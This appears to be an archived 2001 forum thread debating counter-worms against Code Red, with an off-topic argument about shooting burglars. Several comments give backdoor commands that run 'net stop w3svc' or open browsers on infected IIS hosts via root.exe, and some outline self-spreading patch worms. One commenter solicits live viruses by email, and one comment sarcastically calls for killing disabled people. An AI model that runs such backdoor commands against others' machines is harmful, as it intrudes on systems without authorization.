Whereas an anti-virus circulating around is a great idea (thought about that briefly a few days ago), I would suspect that the vast majority of webmasters/sysadmins have patched their systems. The problem lies in all those people running w2k with no knowledge of what IIS is, or that it might possibly be installed on their computer. Having seen the flurry of news on Code Red, I browsed back to localhost on my w2k box and found that I had IIS installed. (Fortunately, my w2k box isn't on a net connection) What really needs to be done is to inform all the uninformed that any NT or w2k box needs to be checked for IIS. If people are using the default installations, they are bound to have IIS installed without their knowledge...
If you did that then the hacker that created code red might sue you for reverse engineering his code and distributing it! If the hacker lives in California then you are really screwed no matter where you are from.
Google cache because it looks like the original site has been remove.
I suppose that it would be possible to use the ISAPI filter vulnerability in IIS to get into a system and patch that very same vulnerability. Maybe someone who knows more about this can clarify.
-atrowe: Card-carrying Mensa member. I have no toleranse for stupidity.
Making a worm to fix the worm is just going to create more problems. My main slowdown of service comes from all the ARP requests from the think scanning my neighboorhood.
./ reader) make a CGI script called default.ida that fixes just that machine that tried to attack your server. Make sure it can deal with Code Red 1, otherwise once 2 is dead, 1 will be able to swing back easially to the unpatched servers. Also make sure it sends a bill to the company for "IT Consulting".
Instead, (idea from another
The Fish virus, IIRC, would remove the Stoned/Michaelangelo virus if it was found, and then infect the machine itself.
Further info about the virus is found here from Datafellow's virus database.
$virus->terminate() if($virus->end()); ? ;)
I mean it's still a virus and would still scan to propagate itself even though all systems are safe and secure. That just pushes the problem to a another layer.
There's a simple solution to every problem...
Our local sysadmin & I discussed this when the "fixing" worm first hove into view: it was a rather "on one hand/on the other hand" kind of conversation.
On the one hand, you really don't want other people, however benignly, messing with the state of the software on you boxen (you should always know what the state of your software is). On the other hand, it had been 3 months since the patch for the lion worm came out -- at that point, you kinda feel that the responsible people should be up-to-date, and maybe the irresponsible ones could use some help.
I guess, in the end, that the possibility that the "fixing" worm could contain bugs that might just make things worse is about the best argument for not doing this.
~kI disagree.
He may just be a burgular, but how do you know he isn't plotting to murder you and rape your wife after he picks up the good stuff? If I know those are his intentions I'll shot him in a second and take my chances with the law, and if I'm not sure I probably won't shoot on sight but one wrong move and he's dead.
A vigialante society would be one that would not wait for due process of law after a crime has been committed. What we are talking about here is defending home, family, and self, which is NOT a crime but a fundamental right. I have the right to self defense, and if someone is in my home on some unknown mission I'm not interested in letting him do whatever and then let the law take care of it. I'm going to stop him, doing whatever it takes to do that. I'd say that right is absolutely fundamental.
Good virus
~LoudMusic
No sig for you. YOU GET NO SIG!
Ethics, smethics...if someone breaks into your home, it seems reasonable to hit them over the head with a bat. So why not whack any machine that tries to attack your machine (whack == exploit the same hole to patch them such that they are no longer affected) The folks who think this is "unethical" probably wouldn't break into a house to stop a rape when they hear screams for help either... Doing nothing can be unethical sometimes too.
Maybe in places like the UK they don't mind that robberies while the owner is home have gone up since the draconian gun laws. I do.
Gamingmuseum.com: Give your 3D accelerator a rest.
> Ethics is religion. Faith is not a Religion. You must understand the difference.
I'm going to have to disagree on this point. Ethics and religion are very different things. They are actually not even directly related to each other. The link between the two is morality, to which both are related. To give an example, it's possible for an agnostic person to act in an ethical manner. Actually, it's possible for any person to act in an ethical manner. It's also possible for someone with a religious ideal to act in an unethical manner without violating his/her religious convictions (the Inquisition is an old example, but it fits, so I'll use it for ease). Religion is a belief system. Morality is a rule set based on the belief system. Ethics is adherence to generally accepted codes of behavior.
And, in response to your second sentence, religion is specifically a belief system. So, while linguistically your statement is correct (one can have faith without a directed religion, such as "faith in the goodness of mankind"), by definition one cannot have a religion without faith.
Virg
Something to this effect may have been said already. But here's a thought. Designate a port (one of the high ones) to accept a query equivilent to, "Do you allow to fix your computer?" where the secure key has to match a list of trusted ones. Granted, this may raise all sorts of privacy issues, but as long as it was consentual, and asked to the owner of the computer before being enabled at all, it might be alright. For instance, I'd allow the Debian security team to apply a patch to a hole in my system. This provides no technical basis to do so, as the hole is already there. Certainly no one with malicious intent is going to bother to ask in the first place, so it doesn't seem as if we have to worry about forged keys and the like. All it does is provide a simple response of "Yes; Date/Time; MyIP; YourIP; original request XOR constant". Nothing extravagent at all. If Microsoft was honest about it, and I think they could be, (security holes look bad enough, not being dirty about a good method to cover them up is smart) then stuff like this would be erradicated much more quickly.
"Nature doesn't care how smart you are. You can still be wrong." - Richard Feynman
Unless the initial virus leaves behind a back-door that the writer of the counter-virus didn't see, or the virus can mutate in such a way that it isn't destroyed by the counter-virus.
There has been a major scientific break-in
(which you can do manually right now with the worm-installed back door.)
Leave that going long enough, and the infected systems will just keep powering off until the IIS feebs get a clue.
Using, presumably, the calculus of intentionality...
Actually, legal issues surrounding this may have already been addressed in the medical world. One of the original polio (I think) vaccines worked like this: the vaccine although "harmless" was still a contagious virus and thus if one person were vaccinated, people around that person could "catch" the vaccine. I don't remember too many of the details, but I do remember learning about contagious vaccines in an immunology course and I think polio was the first one and that it did work. However, I don't remember how long it was used for and whether or not contagious vaccines are still in use.
This is why all diabetics, epileptics, retards, and junkies must be killed before they have a chance to threaten innocent people in their own homes. If they're such dangers, they must be at least locked up in institutions, both for our own safety and their own (better to lock them up than have them wandering into random homes and getting shot.)
The main problem the anti-worm tries to solve is the slow response by computer administrators. Microsoft fixed its problem, but had to resort to using the press to get the average user's attention. What Microsoft could do is have a built-in Windows feature that tells the user when they should there is a patch they need to install. Perhaps ClipIt could pop up with a link to a Microsoft download page. This would not force the user to install anything he doesn't want to install, and at the same time it would cater to M$ users who don't want to spend time keeping up with computer security. Though they're using the user's machine to tell them about the problem, the user agreed to this by agreeing to use Windows.
A "white hat worm" of this sort could be made, but its deployment would be just as illegal as the original "black hat worm" it was created to fight. You're still making unauthorized use of someone else's computer. It doesn't matter that you have good intentions. And what if a bug in your code crashes some machines? How do you prove it wasn't intentional, and that your "white hat worm" isn't really a "black hat worm" in disguise?
Do any of the ISPs accept lists of infected ips and then send a warning email to those users? I looked through my logs, and saw code red hits from a local smalltime website. I emailed the sysadmin and he patched his site and thanked me for the info. But most of the hits are from xxxx.rr.com .
I would love to be able to forward a list of ips back to the ISP and have them send out the emails.
http://www.windmeadow.com/
Apparently, it seems that in the early 1800s, there was a general problem with people smoking too much opium, so people came up with a supposed cure for it -- morphine! Of course in hindsight this wasn't any better than opium, but at least it had a pain relieving effect so there was some medical use for it (and still is). Sure enough, former opium smokers got hooked on morphine, and a new cure was needed. What did we get? Heroin! This was much worse, had no worthy side effects, and has generally been a huge headache ever since. What was the solution? Go cold turkey? Of course not, we came up with yet another new drug -- methadone. This one seems to have the great benefit of not being worse or more addictive than it's predecessor, but that just means that people don't want to stop using heroin in favor of methadone, so while methadone may not be worse, it does little good either.
Like I say, this may not actually be true, but I think it illustrates the point very well. Even if it isn't true, there are still similar examples all over the place -- people that give up cigarettes for nicotine gum, etc.
This sort of suggestion has the same critical flaw: it might look good on paper, but in practice you're just trading one nasty thing for another. Sending out a benevolent trojan sounds like a nice idea, but how do you know that it'll be benevolent anyway? Are you sure it isn't going to be vulnerable to some flaw that will do more harm than good? You've checked all your buffers and are careful in what your program accepts and strict in what it sends out? Moreover, you're confident that, even if it *is* perfectly benign (which, let's be honest, is a tricky assertion at best, and very hard to verify) once it's out in the wild can you guarantee that your code isn't going to get hijacked by someone less saintly or all-knowingly proficient as you surely are?
I doubt it.
These sorts of proposals sound nice but are fraught with danger and likely to come to a bad conclusion, both technically and, let's not forget, legally. This sort of idea comes up every now and then -- K5 is debating it right now, too -- but it's never a good idea and in practice it will never reliably work. It's clever & tempting, but raises more problems than it solves, just like trading morphine for heroin...
DO NOT LEAVE IT IS NOT REAL
m00.
I agree that 'stuff' is worth less than a life. However I don't think that's the end of the story.
Some people, to me, are of negative worth. These would be the rapists and murderers. I wouldn't assume someone was of negative worth, but I think the simple fact of finding them in my house without my permission, despite locks, would be fairly strong evidence for that.
Now, I don't necessarily think these people should be killed, but my adversion to killing is sufficiently lowered in those (hypothetical) circumstances, that I would be willing to shoot, if I thought it was warranted.
Now, what is warranted... Tough question. To me, seeing some kid trying to break into your garage isn't. Seeing someone walking *out* of your house with the TV, isn't. Heading the door be kicked down and seeing someone come in, is.
If I could clearly see them and tell they didn't have a weapon handy, I'd give them a warning to leave. If I couldn't, why would I want to risk my life and that of my family, by giving them a warning which they might use only as a chance to duck for cover before going for their weapon?
There's been a rash of home invasions in my area, which often lead to murder. I don't know about you, but my door has never been kicked down, I think I'd assume the worst, and in that case, be willing to defend myself. Any criminal intending only theft should either announce himself "Hey, I'm just here to steal the TV" or risk my assuming that since he broke the door down, he's probably got more sinister motives, given the rash of invasions/murders.
While what you say is factually true (spoofing the source is tricky), the principle of not fighting fire with fire is still reasonable. Whenever you automatically respond to an attack with another attack you open up the potential for an explosive situation.
:)
The best defense is a good defense. Education and superior software are the safest, most effective cure for network-transmitted-infections.
A funny story from where I work. Some guy took the code from the melissa virus and tried to do the same thing. While doing it, he accidentally ran it and set off his screwed up version of it accross our network. Big fun :)
But even if someone made an "anti-virus" virus, they themselves would probably get screwed over... Even Robin Hood isn't immune to the law...
-- www.RoachMcKrackin.com
For now, I present this idea as a theoretical one. But in the not-so-distant future, I think we can all agree that this is not an "if" scenerio, but a "when."
Our biological immune system is designed to fight biological threats. For the most part, these threats have been encountered some time in the past, and all immune systems that were not able to combat the threat were compromised, and the host died. Due to mutations, only a few immune systems had some characteristic that allowed them to defend against the threat. These immune systems were slight deviations from the "mainstream" immune system in the gene pool at the time. All hosts that had the "mainstream" immune system perished, and those resistant to the threat survived. Due to the void created by the deaths, those with the resistive immune system had more access to the resources left behind, and they reproduced and created the new dominant gene pool, which is resistent to the disease. This is known as "natural selection."
Suppose a nanobot virus is developed against which the human immune system cannot possibly defend. In this case, the only thing that would save the human race would be another nanobot that augments the immune system to provide protection against the new threat.
In this case, most of the human race would not have the resources, or even the means, to learn about this "white-hat" nanobot and to obtain it. Would it be ethical to start distributing this anti-viral nanobot in community water systems?
An unjust law is no law at all. - St. Augustine
Here if it's after dark and you see someone breaking into your car out in the driveway you are within your legal rights to shoot them. It falls under something called "Criminal Mischief at Night" and while it is not a case where you cannot be charged with shooting the guy it is a defense to prosecution that has used with a great deal of success in this state. God I love living in Texas!
Appended to the end of comments you post. 120 chars.
Here is a simple script to parse out the offending IPs and timestamp on linux/apache systems. It removes dupes too. This may be easier to read
/default.ida/) {
//g;
#!/usr/bin/perl
# open the log file
open(LOG,"/usr/local/apache/logs/access_log");
while ($line = <LOG>) {
#Get the code red log lines
if ($line =~
# Split out just the IP and time
($validstuff,$junk) = split(/\"GET/,$line);
($ip,$time) = split(/- -/,$validstuff);
$ip =~ s/
#Put them in a hash to get rid of dupe IPs
$ips{$ip} = $time;
}
}
# Print it back to the screen
@keys = keys %ips;
foreach $tmp(@keys) {
print "$tmp $ips{$tmp} \n";
}
http://www.windmeadow.com/
And for one simple reason: while it looks like the Code Red XXX variant, the fact of the matter is that you don't conclusively know that it is and even if you do, we're not dealing with a clinical lab dissection here. It's in the wild, it's already been backdoored, and someone else may have already loaded SubSeven or something of the sort on and been smart enough about it to cover their tracks, so you're left with your hands in the cookie jar and some explaining to do to some common sense-challenged lawyers.
The Code Red worm is a known quantity. If people see files indicating they've been hit, hopefully they'll be smart enough to pull the plug and reformat/reinstall their system. Past that, there's not much you can do: pulling traces of the worm off the machine might actually be helping someone who came in between the time the machine got rooted and you fixed it as no traces of the worm means they can go back to their ignorant bliss.
Leave it and report it to their ISP's help desk. It's unfortunately the best thing you can do.
Easy does it!
This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
Course the trick is to setup my apache server so that there is a default.ida which happens to be a cgi that will go out there and shutdown their box. In this case they came to me, not the other way around. Much as someone asks for a jpeg from my machine they get the jpeg. If they ask for their box to be shutdown they get it.
I'll die happy after the day someone writes a goatse.cx virus and I see it on the front page of CNN.
It's like asking: If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee?
That's a great analogy. Mostly because of the image it conjurs.
The enemies of Democracy are
The problem with these viruses/worms is that they cause DDoS attacks with all the scanning they do for vulnerable systems. To sufficiently write something that would act as a worm fix would require use of similar scanning methods thus furthering the DDoS potential of these worms.
----------
while (alive) { Work(); PayTaxes(); Eat(); Sleep(); }
Bool
It's not a virus. It's simply a service from cleaning up systems that are bringing down the network. When a system sends a request with a series of XXXX's or NNNNN's, you continue the protocol by requesting that there system load a little program to correct the infection. If the machine chooses to comply, then fine. Otherwise, it can simply not do the request. It would be convenient if part of the program that cleans up the mess also installs this service. That way when other systems request the patch, it will be automatically downloaded and installed. Very convenient. It's not a virus -- it doesn't go hunting down systems. Systems come to it and request the patch!
You may not have to write it in assembly since you can bypass the VC++ runtime library and make API-only executables that are 3-4K in size that can do a lot.
There was a very similar discussion on BugTraq during the first "outbreak" of CodeRed. The consensus pretty much was that while this would be technically possible, and (really) trvial, technically -- the question must arise "we can, should we?" -- and the ultimate answer appears to be a resounding "no".
By loosing another worm onto the network, we would be adding to an already saturated network significantly more traffic -- *and* we'd be violating anothers box/property -- ultimately making the writer of any "CodeRed-Fix_worm" no better than the original authors. (How many worm/virus/exploit writers do you know that have said "i wrote it to show that the vulnerability existed -- so someone would fix it"?)
bemis
-- Everyone in the world is doing something without me.
I thought of doing this a few days ago and I started coding. I got as far as a script to automatically reboot attacking machines, to help slow the spread of Code Red.
I had begun work on a worm called Code Blue that would infect Code Red machines and clean them of Code Red. This kind of work is very laborious since it involves writing Intel assembly code that uses the Win32 API and runs in a Windows environment.
Before I could finish, my best friend (who is a security consultant) informed me that somebody has already done this. There is a perl CGI script going around that you can put into your root directory and name "default.ida" so that infected machines will cause it to execute.
The script connects to the IP of the attacking machine, uses the Code Red II backdoor to clean the system of trojanned files. Then it uses the very same buffer overflow exploit used by Code Red to send a binary to the server that patches IIS, removes Code Red-related registry entries and reboots the machine.
Ok, First I'd like to say that I had this idea, and submitted the same exact story to slashdot about a week and a half ago and it was rejected. It included the idea of a passive code red virus, that only fixed active hosts that probe a machine that I like to refer to as a "code red trap" If network admins worldwide were to put up anti code red stations based on a modified version of the code found on kuro5hin........... (essentially a mouse trap for code red) It could run in the background, install the M$ patch then reboot the pc. (or popup a dialog requesting a reboot) my 2 cents.
Remember that you are unique, just like everybody else.
I have spent the last week thinking this over, and spent some time coding a test. Working with a known named hole, I ran a vulnerable version of named on a few of my machines.
I obtained some script kiddy code to open up a shell on the alternate machine and started to modify it. Since I have no desire to be assused of starting a virus of any kind, I have no intention of finishing or releasing this, but I want to have the concept proven in case someone with more guts than I decided to release something similar.
No matter how you look at it, I believe that releasing this worm would be illegal, at least in the US where I live. Knowing this, I'm not going to concern myself with legal issues, but with ethical ones. The purpose of this prototype worm is to exploit the named deamon and obtain a shell on the victim computer. Then it will send over a copy of the worm, along with a nonvulnerable version of named.
On the victim's side, it will make a copy of all programs and configuration files it needs to change and replace them with safe versions. It will then send a message to root on that machine explaining exactly what was done and why, how to reverse the changes in case the worm broke something, and what to do in the future to avoid the same or similar problems. The worm will then
find and exploit 256 more systems within the same network level, one in each subnetwork. For instance, if the worm is currently working at the class A level for the 24.0.0.0/8 network, it will try to find one system in the 24.1.0.0/16 network, one in the 24.2.0.0/16 network, etc. Each progression will work one level lower. This will prevent the same machine from being hit more than twice for every pass the virus makes over the internet. After finding 256 systems, the worm will shut itself down and remove itself.
The important factors of this worm is the fact that it will ONLY be beneficial. If it causes more problems than it solves, it will be seen as another nuisence instead of fixing security holes as it is intended. It is important that root on the machine is notified of any changes. This gives the administrator the opportunity to fix other potential problems and if necessary reload the system. There must be a way that an administrator can leave configuration files on the machine so the worm will function in a limited capacity. The machine operator can therefore prevent the worm from making changes although they will still be notified if there's a security risk.
The worm will only search for and detect a single flaw in a single program, and only use that specific program to exploit the system and only replace that single program. Updating an entire package to fix one program may actually introduce other security problems into the system. Programs
deployed on the system should also be either compiled on that system or staticly linked to prevent any library conflicts.
On a side note, the worm might also want to check for a root kit on the machine and notify root if one exists. If the machine has already been comprimised (which is possible if there are vulnerable programs running), then the machine will need to be reloaded and root needs to know about it. Fixing one program won't make any difference.
Am I completely off my rocker here? Comments?
-Restil
Play with my webcams and lights here
I'm sure it's possible, but it's still not ethical to go in and change people's systems without their knowledge or consent, even if you're "helping" them.
Why hop around the entire 'net? This will only waste more bandwidth.
;-), and make it available so that anyone who has the balls (or is stupid; same thing I suppose) to use it can do so. The hell with them, I'll deal with the legal issues....just get these comprimised Microjunk web servers off the 'net already.
Instead, why not setup something that will detect an attack (check those web logs) and send the "fix" to that attacker? I think it's ridiculous that MS has created such a pile of garbage (ridiculous, not surprising) and helping them isn't something I necessarily favor, but: 1) I'm tired of dealing with unwanted network traffic and 2) the 'net overall has started to bog down because of this crap.
As far as legal issues, well, how legal is it for someone to have a comprimised machine that's attacking your system? The "fix" shouldn't do anything terrible....maybe create a folder on the desktop that says "UPDATE YOUR OS NOW!!" and then disable the machine (nicely).
If someone made a reasonable fix, I'd use it. Just make it, set it up so it doesn't destroy the attacking system, don't let it destroy the host system
Why just infect the infected machine and close the backdoor, but have the virus actually carry the Microsoft fix and install it right there and then.
Wow, aren't MS products great that allow you to use so much power through a mail client?!
*sigh*...
I'm going to insult the next person who mods me up too, and hopefully we'll start a cool new Slashdot trend.
I personally can't construct a situation like this, but let's say that the microsoft patch (or whatever patch your virus applies) causes that person's version of IIS to crash? Maybe they've got some crazy-ass custom app that uses those index server extensions for something and patching it breaks their custom app and that's why they haven't patched their IIS server? Then you really would be liable for lost business, etc.
:-)).
Or course, this seems highly unlikely. OTOH, strange things can happen with NT/IIS (asp-to-mail is my personal fave). Let's just use this as a purely hypothetical example. There might be a case where someone has a good reason not to patch their system. That doesn't excuse them from pursuing alternate methods of blocking or preventing this kind of thing, but you really can't assume that 100% of unpatched servers are unpatched due to stupidity or laziness (five nines, maybe
But wouldn't this be harder to prosecute? After all, if you leave the burglar alive, it's your word against his. If you kill him, it's your word against a dead man's. You can say anything you want about how he threatened you, appeared to brandish a weapon, etc. Heck, you could quickly get an illegal handgun and stick it in his hand to seal the case shut.
Interesting, interesting. Let's talk (off topic) about right and wrong...
Right and wrong... these are concepts, right? Ideas. But does a sea turtle know the difference between right and wrong? No. And what guides the actions of a sea turtle? Just drives, hunger, sex, etc. How are we different? Why do we bother to talk about concepts like right and wrong? Are we only driven by hunger, thirst? No... we are driven by ideas. You serve an idea. It drives you, determines what you do in the same way hunger drives a sea turtle.
Ideas are programs, sets of instructions, and you are the computer that follows them. So who are the programmers?
Philosophers and religious leaders. The ones who come up with the ideas.
Don't post on slashdot. Get back to work.
I recall a number of stories (quick Google search returned this Guardian link) about modifying viruses IRL to cure real diseases. What you're talking about is a digital equivalent. Of course the real world viruses don't spread from body to body through the air (far too dangerous), so to maintain the analogy, you have to choose which digital doctor you'll allow to inject you with a computer virus. Can you imagine a Mad Doc McGates? *shudder* Hold on, this is just like downloading a virus update file... oh well.
This is not a sig
Law or no law, I think you'd have a hard time finding a jury who wouldn't sympathise with the home owner, especially if they have small children. If someone willfully breaks into your home, they're asking for it. They have no right to be there.
"I object to doing things that computers can do." -- Olin Shivers, lispers.org
I'm no moderator, but take heed, for the above is very funny.
A better (and possibly less illegal) approach would be to implement a "passive worm" that sits on your server and monitors the httpd logs, and only goes out and disinfects and patches servers that attempt to break into your system. In this case (it could be argued) the administrator of the server running the passive worm is only trying to defend his machine from attack.
Clearly some sort of automated solutions is needed. Since IIS is installed by default on many systems as part of another software installation there are too many people out there with vulnerable systems who have no idea how to patch them.
*wishing*
Just put up a website on your computer that advertises the ability to automatically clean the CodeRedII virus off of the viewer's system, if present.
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (etc), which then scans the sender's IP and proceeds to start a command session, download the patches, and do whatever else is needed to done to vanquish the worm.
:)
... afterall, they tried to hack your box first. ;)
All the viewer has to do is click a button at the bottom of the screen.
Just so happens that this particular button sends a request to
Afterall, they did click on the link, right?
Seriously though, if someone wants to get all pissy about you going to their box and fixing their screwup, threatening to sue and the like, I'd just countersue
The way i see it, we would have just as big of problem with the "cure" worm. How would we stop the "cure" worm, send out another one? and so on. It would suck up all most as much bandwith as code red.
The indexing server is bundled with IIS, and is one of the main reasons for choosing IIS -- searching is bundled right in. Comparing it with "some CGI script" is disingenuous.
It would be fair to compare it with Apache modules that are part of the standard distribution and are usually installed. Care to point out a recent hole in such a module?
Insightful, my foot. The pro-MSFT moderators are busy today.
As a more casual defense, I've written stuff that causes the worm to hang in its receive function: http://robertgraham.com/tools/deredoc. It's kind fun, I've got hundreds of worm threads waiting for me to respond back to them.
You can create benign anti-worms. You can setup a worm to only counterattack when attacked itself. Such a worm would not bother innocents, and would only spread to infected systems, cleaning as it went. In other words, it wouldn't be 'scanning' -- it only responds upstream to infected systems. There are two problems to that approach: the first is that CodeRedII self-DoS itself, so the systems cannot be exploited, either with the .ida attack or the backdoor. The second problem is that a heck of a lot of these systems are behind firewalls, and you cannot directly contact them on port 80 (CodeRedII has been extremely effective about worming its way around firewalls).
You can evade legal constraints. Post the source of your anti-worm to Usenet as an example how an anti-worm is constructed. This is legal free-speech -- as long as you don't encourage others to run it.
CodeRedII is raging inside corporations. It would be extremely ethical to put something on your own machine to help stop it. One example would be a script (CGI, PERL, PHP, ASP) named /default.ida on your system that did something like "/scripts/root.exe?/c+net+stop+w3svc" back at the attacker.
I agree.
If you shoot a burglar there are two crimes: a burglary and a homicide. In my book homicide is far more serious.
Killing criminals should be left only for the law-enforcement people. Otherwise we'll end up with a vigilante society.
Ehmmm,
For those of you participating in the DOS attack against Securityfocus...
Although, they did not launch a posting to this, in the mailing list they said that they were going to discontinue taking mailings from people.
When I went to get the link for this message I found that they are having a hard time responding to HTTP requests... Perhaps caused by the slashdot community?
Lando
/* TODO: Spawn child process, interest child in technology, have child write a new sig */
IANAL.
Is human life worth less than property?
You sure seem to think so.
To me taking a human life is acceptable only purely as self-defence in a life-threatening situation. "Protecting your property" is not enough. You can always buy more stuff, you can get an insurance. Hell! You can set up alarms all over your property if you're so worried about it.
Human life, on the other hand, can never be restored.
this isn't original, a friend found it posted somewhere, but you can call up an internet explorer window with the cert advisory(or the patch for that matter)byt usung the root.exe file. like such: http://the.fckd.up.host/scripts/root.exe?/c+explor er+htt p://www.cert.org/advisories/CA-2001-23.html
this works great for cable/dsl users who might not even know they have a webserver running. kinda tough to ignore explorer windows poping up, even on a MS computer.
Don't allow any connections inbound to the network that weren't initiated from the inside. Businesses have been doing this for years with stateful packet filtering or proxy firewalls. There's really no reason to let users run web servers on the net.. cable modem and DSL users are just too large a risk to allow unfettered server access. Now, if you sign a contract and agree to do a risk assessment of your server and keep up with patches (at risk of legal penalties) then fine.. you can run your web servers.
/* If someone is breaking into your house to use your coffee maker, are you allowed to kick down their door and throw away all their coffee? */
If the bastard is in *your* house, it really doesn't matter *why* he's there. You don't know for sure why he's there, all you know is he broke in your house. That's why if someone breaks into your house and you blast him, it's generally held as self-defence.
With computers, it completely different. With a case like Code Red, after examining the virus itself, you can determine the damage it causes *after* the fact. However, sometimes that's "too late" and loss of property is accomplished (I don't care what the "anti-intellectual rights" people say. If I write a document, that document is mine, whether on floppy, printed out on a sheet of paper, or scribbled on a napkin.) The argument would be: If someone is actively probing my house for weaknesses, is that person considered a hostile threat? In my neighborhood, yes they are. You bang on my windows and doors trying to test the locks and 5-0 will on your ass faster than you can say "But, I was just testing to see if the doors were unlocked..." Intent is the key and unless you *live* in my house or I give you explicit permission to test my house, I, and the police, will assume your intent is hostile. Let your lawyers fight it, I don't care.
Unfortunately, this is not my house. If anything, the internet might be considered some kind of "private commons." It'll probably be illegal as hell for someone to write an anti-codered virus, but hell. Seeing how thousands of sysadmins, after extensive media coverage, STILL haven't closed the holes, they're wasting *my* bandwidth, *just* like spammers, eh?
I say someone needs to write the anti-code red innoculation, and then someone else needs to write an anti-Outlook virus (one that turns off all those nasty features that make it so dangerous to mail servers around the world).
Knowing our current justice system, however, the writer of "anti-code red" would be tracked down and hauled to court (and then jail) while the real perpetrators would continue to crank out virii after virii...
Just an observation: I've noticed that a lot of the so-called "Chinese virii" (Code red, "fuck USA government, etc) all seem to have major flaws in their design, implementation, etc. Does anyone else get the idea that someone, somewhere, is getting an education from all this? I mean "Yes, the virus worked, but.. Ahh.. crap, forgot about that... I'll fix that next time.." It's almost as if these are HS/College course projects...
If you were me, you'd be good lookin'. - six string samurai
Just remember to say "Hi!" to Max Vision when you are in the slammer....
No, it's shooting a gun at people who are firing their guns at random: it's just a matter of time until they hit someone else.
"A good conspiracy is an unprovable one." -Conspiracy Theory
I remember seeing a /. blurb about just such a thing. If I remember right, after it invaded the system, it patched a security hole, copied itself onto whatever removable media was in the computer and deleted itself. Unfortunately I couldn't find the article in the archives.
In the meantime, this sort of program is pretty trivial, aside from invading a secured host. I've heard talk in various organizations about writing maintenance viruses to crawl the network's hosts and do whatever updating needed to be done. Such ideas are usually tanked because everyone's a little nervous about independent critters running loose, doing things on their computers. Besides, there are more reliable automated ways to install patches and updates. In the meantime, writing one of these as a good samaritan deed would likely get you prosecuted because, 1) You don't own the computers you're infecting 2)You don't know what the configuration is on the machines and your virus might screw 'em up, 3)What if you missed a bug in your code?
After all, how do you tell a 'good' virus from a bad one? It might be harder than you realize, if you're a virus scanner, for example. There is an article here that deals with some of the other issues that 'good' viruses raise.
Geeky modern art T-shirts
I find it very interesting to watch these worms/viri spread. If we could get companies to fix the design flaws in their software then these scenarios would occur very less frequently.
Have you read the Moderator Guidelines
I did the same thing, and so far the only e-mail I've gotten is from one person who asked me to "send the e-mail to the proper abuse address". Freakin' idiot. If you'd admin'd your machine properly in the first place, you wouldn't have been getting e-mails from me!
Oh well, hopefully someone who's gotten an e-mail has done something about it. Not holding my breath though. =)
WWJD? JWRTFM!!!
but when will i get a
Certified Black Helicopter Pilot *** Unwitting Dupe of One World Gov'ment
With the internet, this is a greater danger because the number of machines is much larger...
LedgerSMB: Open source Accounting/ERP
hey guys can you doo me a favor ? please mail me the latest virii you have, or also older ones, you got by mail.
i'm realy intressted in them.
please mail them to prax2000@gmx.net
thanks. also if you know a Virii database, would be pretty cool you could tell me about it.
Thanks.
There have been a lot of discussions on this topic over the past couple of years on several security mailing lists that I either belong to or frequently browse the archives of. While it is certainly possible to do so and it would solve some headaches and the irony of it all would make for a great story, it's just not something that should be done. System administrators need to learn that they must actively protect their system by keeping up to date on patches as well as taking other steps (IDS,Firewall,Log Monitors,Ect..) to keep their systems secure. By creating a counter-worm system administrators are not being taught the hard lessons learned when their system is attacked and infected. Administrators either start to rely on counter-worms or they simply never become aware that their system was comprimised because the counter-worm has already patched things up. Counter-worms do not promote good administrator habits and is only helping to promote the PROBLEM (lazy/unaware sysadmins) rather than the SOLUTION (education and motivation to keep a system protected). And there's another reason that I just mentioned. What happens when a counter-worm patches up a hole before a systems administrator sees it? It's possible that after the initial infection by the worm, the system was further comprimised by other crackers. But the counter-worm wouldn't investigate such possibilities, instead it just patches the initial hole. Any new backdoors implanted by crackers AFTER the initial infection would go undetected. This can't be more obvious than with Code Red II. Sure if you become infected, you can delete root.exe and explorer.exe and patch up your IIS system. But what about what went on between the intial infection and when you patch the system? If the web server log files have been erased or altered in any way, you have nothing to go on to tell you what was done to your system. The final solution becomes a full format and reinstall of the system from a (hopefully) clean backup. Counter-worms are only counter-productive to the security of computer systems and the Internet. And I haven't even begun to touch upon the legal and ethical problems of using a system without authorization. Not every system administrator out there is going to be happy that you're rooting around their system after it was r00ted. Some (MOST) are going to suspect you did more harm than good. I've had personal experience with this and know it to be a fact. So stay away from writing counter-worms. Instead write an article informing people about the dangers and what to do to fix the problem. Send it to a local paper, send it to an online forum or magazine. You'll do far more good that way than by launching your own counter-worm.
While what you say is factually true (spoofing the source is tricky), the principle of not fighting fire with fire is still reasonable. Whenever you automatically respond to an attack with another attack you open up the potential for an explosive situation.
Yes, I agree totally with that principle. I do however prefer to use factual arguments and not bullshit like the commentor that I responded to did.
"Rune Kristian Viken" - http://www.nwo.no - arca
...have already seen such things. The "cheese" virus closes backdoors, and the "ramen" virus pollitely informs you you need to update your version of Red Hat to fix security issues. If IIS and Outlook users want to write code to fix virus-related problems, thats fine. I'm sure theres a job waiting for them in Redmond.
It is pitch dark. You are likely to be eaten by a grue.
If you do that, how would our anti-virus software (like norton) make the difference between a good and a bad virus ?
Iraq: war to save the U
Thats EXACTLY what I have been trying to do! You can find a more detailed explanation of my code at http://24.18.6.248/default.asp (latest news update)
I just cannot get the damn thing to work outside the test environment. Email me if you want more info or want to check out the source.
Gam
"Flame at Will"
I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
> A: Microsoft needs to release more secure OS/Web servers.
This *may* be the case, but I think you're falling into the ever so common (and closed-minded) "MS BAD, GNU GOOD" mindset. Yes, open source is a better programming method.. But excellent programs aren't written in a day. IIS is currently standing the "test of time" right now, and there is a huge bug in it, just as there have been huge bugs in [insert your favorite open source program here]. I would bet the next major release of IIS will not have this security hole.
> B: People need to patch their system themselves or take it off the net.
Agreed.
-Hoyt
It is possible, as in 'doable' - that's true. But think about the implications.
First being technological. Say, you have a 100 or so viruses going around. Would you scan all your neighboring subnets and infect all the machines you find with an 'anti-virus' like that? If CodeRed by itself creates bandwidth issues and headaches (think AT&T @HOME), think of a 100 or so 'anti-viruses' contributing in the same way at the same time!
Second being ethical. If you are hacked once, do you want another 100 people to hack your computer to 'fix' the damage someone else has done? Or, better yet, How would you like people hacking your machine in a 'benign' fashion because they were pursuing a good cause, and hacked your computer to vaccinate it? The cause is noble - it might prevent the spread of the real virus, were you ever to be infected by it, but how much do you care about how good the intentions of the one who hacked you were?
